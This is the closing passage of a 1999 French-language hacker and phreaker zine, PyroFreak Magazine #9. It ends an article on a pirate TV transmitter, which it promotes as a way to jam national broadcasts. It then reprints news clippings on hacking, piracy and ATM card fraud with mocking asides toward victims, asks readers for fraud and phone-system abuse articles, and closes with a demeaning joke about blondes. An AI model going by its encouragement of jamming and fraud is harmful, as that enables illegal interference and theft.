tu brouilles plus ou moins l'image de toutes les personnes de ta ville regardant TF1 a ce moment la. L'emetteur ne sert donc pas seulement a diffuser ta programmation mais peut aussi devenir une ARME DE BOYCOTTE contre les programmes tele nationaux de ton choix (Chances aux chansons, ARTE !!)... V. Conclusion L'utilisation d'un emetteur tel qu'il est decrit dans cet article est STRICTEMENT INTERDITE !! En aucun cas, je ne pourrais etre tenu responsable de l'usage des informations techniques de cet article. Si mes souvenirs sont bons, se faire busted pour l'utilisation d'un emetteur tele pirate coute chere (jusqu'a 500 000 Frs d'amende...). Mis a part ce petit rappel civique, je tiens a dire qu'avec ce type d' emetteur, il est possible d'emettre sur une portee libre (sans obstacle) de 10 Km... L'ideal etant de se trouver en hauteur lors de l'emission. Il est possible de rajouter de multiples elements a l'emetteur, par exemple une camera CCD pour faire du live. Pour les plus reveurs, meme si l'emetteur de cet article ne le permet pas, j'ai entendu parle d'une possibilite d'emission UHF-VHF pirate avec relais sattelite... Voila, c'est la fin de cet article. J'espere que vous aurez tous compris et que vous concurrencez TF1 par la qualite de vos emissions personnelles (ce sera pas trop dur...) @++ ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |35-Les nouvelles en vrac |( ) Phreak ( ) Hack (X) Autres '.________ _____ _____________ _________________________ ______ __ ___ Branche toi Colis de Pauline Article tiré du Canada Francais Mercredi 15 Dec 99 Gilles Lévesque Depuis un mois déjà, il avait été entendu que la ministre de la Santé et des services sociaux du Québec, Mme Pauline Marois, rencontrerait la Direction et certains médecins spécialistes de l'hôpital du Haut-Richelieu à ses bureaux de Montréal, le 13 décembre dernier, à 14 heures, pour dis- cuter des ÉNORMES problèmes que rencontre cet établissement de santé. Or, vendredi dernier, l'attachée de presse de la ministre a dans un premier temps a demandé à la direction de l'Hôpital s'il était possible de devancer cette importante réunion de quelques heures, en avant-midi. Les principaux intéressés ont alors pris les dispositions nécessaires pour qu'il en soit ainsi, ce qui n'a pas été sans impliquer une multitude de téléphones et de modification à l'horaire des représentants de l'Hopital. Plus tard, ces derniers recevaient un deuxieme appel pour apprendre que la ministre avait finalement pris la décision de reporter cette rencontre à plus tard, fort possiblement d'ici Noel. il en a résulté, vous vous en doutez bien, une grande déception. NB de Neuro: J'me demande ben cé quoi qu'a l'avais de plus important a faire. Nouvelle de dernière minute, la réunion a été remis au 24 Janvier 99, pas pressé pis cé vrai. ------------------ Coupe té cheveux cris de pouilleux Article tiré du Canada Francais Mercredi 15 Dec 99 Louise Bédard Un jeune prévenu de 21 ans a eu de droles de conditions de remise en liberté. Parmi ces conditions, le jeune homme devait demeurer chez ses parents, se soumettre à leurs directives et se couper les CHEVEUX. Pas question d'imposer une telle condition, a réagi le juge même si comme parent lui aussi préfère les cheveux courts. NB de Neuro: Ou cé que la justice s'en va? -------------------- Les services secrets US hackés Lu dans le Times. Des officiers de l'armée américaines ainsi que des agents spéciaux attachés au sénat US ont subit des détournements d'argent via leurs comptes en banques. Il semble qu'une fuite au congrés ait permis à des pirates de retrouver les comptes bancaires, ainsi que les numéros de sécurité sociale des agents. Le Pentagone a notifié que, dorénavant, plus aucune informations sur ses membres ne seront tramsmises au Sénat américain. On doute que les pirates connaissent l'identité de leurs cibles, en tout cas le fichier doit valoir son pesant d'or. (Sources HNN) --------------------- Des internautes pas content Les internautes australiens ne sont pas content de la nouvelle loi qui autorise les autorités à "pirater" leurs ordinateurs en cas de besoin. Pour protester, des hacktivistes ont modifié le site du gouvernement australien. Pas sur que cela serve la cause des anti-big brother. (Source TazMagazine) ---------------------- Journal De Montreal Samedi 23 octobre 1999 Un septuagénaire coupable de trafic de drogues EDMONTON (PC) — Malgré sa promesse à la Cour de "prendre sa retraite" du métier, un homme de 78 ans a été condamné vendredi, à Edmonton, à purger une peine de prison pour trafic de drogues. Donald Chinn, âgé de 78 ans, a écopé une peine de deux ans moins un jour de prison après avoir plaidé coupable à des accusations de trafic de drogues - du Talwin et du Ritalin, un "cocktail" de médicaments surnommé "l'héroïne des pauvres". Le septuagénaire avait vendu la drogue chez lui à un agent double en trois occasions, en août 1998. Une perquisition dans sa résidence avait aussi permis de découvrir de la cocaïne, de la marijuana, 22 pages de relevés des ventes et une liste de clients. En 1986, alors qu'il avait atteint l'âge de la retraite, Chinn avait été trouvé coupable de possession de drogue. Puis, à 68 ans, il avait été condamné à 18 mois de prison pour possession et trafic de Talwin et de Ritalin. Le père de 12 enfants a eu beau promettre à la juge de se retirer définitivement, rien n'y fit. Il a cependant demandé de purger sa peine au pénitencier de Fort Saskatchewan, où son frère de 81 ans pourra le visiter plus facilement. ---------------------- Journal de Montréal Mardi 14 septembre 1999 La consommation de drogue et d'alcool est en hausse chez les adolescents TORONTO (PC) - De plus en plus d'élèves dans les écoles secondaires consomment des drogues et de l'alcool, révèle une nouvelle étude fédérale qui sera publiée le mois prochain. La ministère de la Santé a interrogé 12 000 élèves en 6e année, ainsi qu'en 2e et 4e secondaires, l'an dernier, pour évaluer leur état de santé. Le Canada s'est classé troisième parmi 11 pays quant au nombre de jeunes de 15 ans qui ont été "vraiment ivres" plus de deux fois en 1998, cinq positions devant les États-Unis. Environ 43% des jeunes Canadiens - garçons et filles confondus - ont avoué qu'ils avaient été "vraiment ivres" plus de deux fois l'an dernier. Chez nos voisins du Sud, 34% des garçons et 24% des filles ont dit s'être retrouvés dans cette état. Les résultats "(...) ne surprendront pas les professeurs et ne feront que confirmer leurs anecdotes", croit l'adjoint au conservateur du collège des professeurs de l'Ontario, Joe Atkinson, qui a publié un survol de l'étude dans la revue trimestrielle de l'organisme, la semaine dernière. Selon l'étude, la consommation de marijuana, de hashisch, de cocaïne, d'amphétamines et de LSD serait en croissance chez les jeunes. Parmi les élèves de 4e secondaire, 44% des garçons et 41% des filles ont admis avoir déjà fumé de la marijuana plus de trois fois, des hausses respectives de 30% et 27% par rapport à 1994. "J'en ai parlé à mes propres enfants et ils m'ont dit que la marijuana est très facilement accessible (...) encore plus que les cigarettes", a raconté la responsable du projet au ministère fédéral de la Santé, Mary Johnston. ----------------------- Journal de Montréal Mardi 21 décembre 1999 Pirates internet condamnés en France: satisfaction des maisons de disque LONDRES, (AFP) - La condamnation en France cette semaine de deux internautes pour piratage musical constitue une première en Europe et apporte "un soutien important" à la lutte contre ce phénomène, s'est félicitée mercredi la Fédération internationale de l'industrie phonographique. Dans un communiqué, la Fédération (International federation of the phonographic industry, IFPI) se félicite de la condamnation le 6 décembre par le tribunal correctionnel de Saint-Etienne (centre de la France) de deux jeunes gens de 24 ans et de 21 ans qui avaient construit un site permettant de télécharger gratuitement des oeuvres musicales. Ils ont été condamnés à deux et trois mois de prison avec sursis et solidairement 140.000 FF de dommages et intérêts (près de 22.000 dollars) de dommages et intérêts à la SACEM (société pour l'administration du droit de reproduction mécanique des auteurs compositeurs et éditeurs de musique) ainsi que des compagnies comme Sony, Warner Brothers, Atlantic. De mi-avril à mi-juin, plus de 15.000 connections avaient été réalisées sur le site pirate qui distribuait illégalement les derniers albums de Mylène Farmer, Will Smith, Tori Amos, Madonna ou les Cranberries. Ce jugement, "le premier contre des pirates internet en Europe", selon l'IFPI, "intervient quelques semaines à peine après le lancement par l'IFPI, avec le soutien de nombreux artistes, d'une campagne pour promouvoir la diffusion légale de musique sur l'internet". L'IFPI estime à un million les enregistrements illégaux disponibles à tout moment sur l'internet et a lancé une campagne pour lutter contre des centaines de sites illégaux du même genre dans plus de vingt pays. Déjà, le marché des enregistrements pirates sur supports physiques, principalement des CD, est estimé à 4,5 milliards de dollars par an dans le monde. "D'autres jugements sont nécessaires pour promouvoir la diffusion légale de musique sur l'internet", souligne l'IFPI, selon laquelle d'autres décisions de justice sont attendues en France, mais aussi en Suède, en Belgique et en Italie. "La piraterie sur l'internet constitue un problème croissant pour les ar- tistes et les producteurs alors qu'ils développent des activités légales on line", selon l'IFPI. --------------------- Journal de Montreal Mardi 21 décembre 1999 Les DVD pirates ne devraient pas tarder à arriver! (AFP) - Après les éditeurs de musique, c'est au tour de l'industrie du cinéma de s'inquiéter de la diffusion pirate de leurs produits sur le Net. Deux programmeurs ont créé un programme qui permet de décrypter les DVD. Les producteurs d'Hollywood ne s'étaient pas affolés outre mesure, vu la qualité médiocre, lorsque des copies du film Matrix ou du dernier Star Wars étaient apparues sur Internet. Les fichiers disponibles au format MPEG semblent avoir été réalisés à partir d'une capture, avec un caméscopes filmant la projection dans une salle de cinéma. Mais le programme, DeCSS, créé par deux programmeurs norvégiens permet de réaliser une copie parfaite de l'original à l'image copies pirates de CD audio. L'utilitaire qui ne pèse que 60 Ko permet de décrypter le contenu d'un DVD sur un disque dur de capacité suffisante (entre 4,7 et 9,4 Gigaoctets). La prochaine disponibilité de graveurs de DVD à des prix abordables permettra de recopier les fichiers piratés sur le même support que l'original. Il existe même des utilitaires qui permettent de convertir et de compresser un film DVD pour le faire tenir sur un CD-Rom. Dans un article publié le 1er novembre dernier Wired News explique que les programmeurs ont exploité les faiblesses techniques et humaines du système de protection des DVD. Toutes les sociétés qui réalisent des produits utilisant la technologie DVD ont l'obligation de crypter la clé de décryptage. Le développeur de l'une d'entre elles a omis de le faire, les programmeurs norvégiens ont donc pu désassemblé le programme. Une clé spécifique est attribuée à chaque entreprise. Chaque DVD contient l'ensemble des clés soit environ 400. Les deux développeurs sont membres d'un groupe dénommé MoRE (Masters of Reverse Enginerring) dont l'un des fondateurs Jon Johansen a expliqué à Wired News que la longueur des clés, seulement 5 octets, leur avait permis d'en découvrir 170 avant qu'ils ne se lassent de toutes les tester. L'industrie du DVD n'a pas encore réagi officiellement. -------------------- Journal de Québec Samedi le 27 Novembre '99 -= Fraude Au Guichet Automatique =- OBLIGER DE S'ENDETTER POUR REMBOUSER 2200$ Montreal - Deux autres victimes de fraudes avec des cartes bancaires se sont manifestées , hier, racontant a leur tour comment des individus ont pu acceder a leurs comptes de banque pour leur soutirer des fonds. Ce type de fraude commence a prendre des proportion inquitantes si l'on en croit les nouveaux temoignages qui s'ajoutent a ceux rendus jeudi par Stéphanie Paquette , et ,la semaine derniere par Genevieve Laverdure. Cette fois , cest une Lavalloise qui a ete obligee de s'endetter pour rembourser 2200$ soutires dans son compte et un citoyen de Saint-Hilaire qui attend toujours de pouvoir recuperer les 740$ qui ont ete subtilises dans ses comptes a la caisse populaire. "Le 9 juin, jour de mon anniversaire, un ou des individus ont fais des faux depot dans mes comptes dit Jordan Madore, 19 ans. Ensuite, ils ont tente de returer des fonds. Au total en incluant mon autre compte, ils on prit 740$." Nancy Miron, 22 Ans, a vecu une situation fort differente: "Je sais exactement qui a utilise ma carte pour commetre les fraudes le 30 juillet dernier. [Mouin au mois de novembre ils se plainde des fraude de jouin juillet...] [Cest quand meme expliquer plus loin! ] "J'ai donne son nom son numero de telephone et son adresse auc policier de Terrebonne et tout ce que jai recu cest une lettre m'informant que la procedure etais dans les mains du procureur de la couronne pour fins d'analyse" Jordan Madore constate lui aussi que le systeme judiciaire et les institutions bancaires ne savent pas trop par quel bout atequer ce nouveau fleau. Apres avoir porte plante au pres des policiers de sa ville, le jeune homme a contacte sa succrisale pour aprendre quil avais le fardeau de la preuve... "La femme ma dit: Tu nes pas sensee faire de faux depot dans ton compte. Les enveloppes que tu as deposees etaients vides! J'avais de la misere a le croire mais elle pensait que cetais moi qui avait fais ca." A LA CAISSE Jordan Madore entrevoit une luerur d'esoiir au bout du tunnel. "Je crois quil aura son cheque au debut de la seamine a dit Micheline Blouin, responsable des services aux usagers de la caisse populaire Saint- Edouard, a Montreal. Il semble que nous etions incapable de relier le genre de fraudedont ila ete victime aux fraude habituelles" [Pas tarte la bonne femme debord!] Le dossier de Genevieve Laverdure, lui, ne semble cependant pas pres daboutir. "Cest vrai quelle a du contracter un pret car le fraudeur connaissait son numero didentification personnel (NIP) a dit Louise Sylvestre, preposer administrative a la caisse populaire de Bois-Des-Fillion, ou se trouve le compte de la jeune femme. 0"Le NIP, cest comme une signature qui doit etre personne et selon ce que nous avons appros le fraudeur le connaissait" [Ouais povre conne!] --------------------- -= LE CRIME DU DEBUT DU PROCHAIN MILENAIRE =- (m.A.) - La fraude par carte de guichet ou carte de credit sera certainnement le crime du debut du prochain millenaire, predit la police. Le lieutenant-detective Gerard Robert, de la police de la communaute urbaine de Montreal, sait de quoi il parle. Cest lui qui dirige lequipe de detectives charges de ce type de fraude. Les plaintes, qui sont de plus en plus nombreuse devraient atteindre des sommets encore plus eleves dici peu, craint-il. Ce sont surtout les nouvelles techniques utiliser par les fraudeur qui inquietennt le detective Robert. Les criminels sont de plus en plus sophistiqués et ils arrivent a copier souvent facilement les information secretes sur les carte de credit ou de guichet. [Quelqu'un sait comment?] INTERNET Le commerce par Internet, qui est en forte progression nest pas pour attenuer non plus les craintes de fraudes, dit le litenant Robert. Concernant les cartes de guichet plusieurs cas individuels signales ces derniers jours ajoutes au reseaux de fraude decouverts cest derniers mois nannonceent rien de bon :) Le seul conseil que peu actuellement donner la police dapres mr.robert a trait a la protection de son (NIP) CACHER SON NIP "Les utilisateur doivent absolement cacher le claver lorsqu'ils composent ce numero" dit (encore) rooobert! Quant aux personnes qui se font vider leur compte banquaire, le policier explique que les enquetes sont souvent ardues et tres longues. Les citoyens qui se procurent des cartes de credit ou de debit signent des contats civils avec les institutions financieres "Ce sont ces contrats qui regissent les cas de fraude", dit le policier Generalement, les banques ou les caisses populaires remboursent leurs clients qui sont victimes des reseaux criminels [ hummm kay!,Voyez! ] COMPLICE Toutefois, certains cas ne sont pas regles rapidement puisque plusieurs supposees victimes sont en realite de meche avec les fraudeurs. La ceuillette des preuves est tres longue, dit Robert... Il cite a ce sujet le cas du reau qui avait pour point cetral une station-servic de Laval. Bien que la fraude ait ete decouverte en juillet certaines institutions nont pas encore fourni aux enqueteurs les donnees essentielles sur lidentite de leurs clients victimes du reseau ni les montants dargent perdus. ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 : |36-Conclusion '.________Par Neuro_____________ _______ neuro@pyrofreak.org __ __ Un autre numéro de fini. Donc, si vous avez des idées sur comment amiliorer le magazine, faite le nous savoir a pyrofreakmag@hotmail.com , et ca va nous faire plaisir de lire cela. Bref, notre but c'est toujours de s'amiliorer, donc on est ouvert pas mal a toute. Bon pour terminer, PyroFreak aimerait vous souhaitez de Joyeuses Fetes, et amusez vous bien. ___________________________________________________________________________ |Si vous voulez qu'un de vos articles paraisse dans le #10, envoyez le à | |pyrofreakmag@hotmail.com .(Les articles envoyés les en .txt ou .rtf SVP!) | |SVP, essayer de vous forcez pour les fautes d'orthographe et la mise en | |page (Pas de retour a la ligne automatique SVP). Ou si vous avez des ques-| |tions ou commentaires, envoyez les aussi à pyrofreakmag@hotmail.com . | |__________________________________________________________________________| Sujets D'articles proposés: -Logs de scan 1-800 ou autres -Explication de nouveaux type de Vmb ou Pbx -Critiques de divers programmes se rapportant a l'underground -Informations intéressantes sur les cellulaires ou pagettes (Tatoo) -Informations intéressantes sur un type de fraudage -Technique de hack particulières -Anecdote particulière -Programmation intéressante pour L'underground -Etc, utilisez votre imagination! Site Web: www.PyroFreak.org IRC Chan: #PyroFreak Salut et a la prochaine et passer de bonnes fêtes!!!! De toute l'équipe de PyroFreak Pensée: Connaissez vous une blondinette:)) brillante???? J'ai beau chercher et personne me vient a l'esprit. _____ _____ _ ______ ______ __ ___ _________ |: __ _ \ \ \ / / | ____ | / ___ | | \__ _\ \ \ \/ ; / |; /_ _/ | / / /; | | ____ __ ___\ \ : / |: _ / | / / : | |: | / , / |, | \ : \ | :\__/ | |; | ___/ . / |. | \ ; \ | ; / |___\ \________/ |___\ \__ ____\ |__________| ____ _ ___ __ ___ ___ ______ __ _______ |: _ _ ;\ | \ \ \ / ;| | | / . / | | \_______\ |: _\ \_ _\ / /| :| | ;| / / _| |___ _____ |; |__ ____ / <_| ,| | |/ : / |_|, ___| |; .\ | __\ \_:__\ / _ | | ;/ |: | |: ` / | :|____ ____ \ / |; | | |\ \ |; | |, |\ \ | ; \ \ ;\ \/ |: | |: | \ \ |___\ |__| \_| |________\ \____\ |____| |___\ \_____\ Crédit: __2 '::-::` (o o) ooO--(_)--Ooo- 1999-2000(c) tOUT lES dROITS sONT réSERVÉS à pYROfREAk mAGAZINE 2000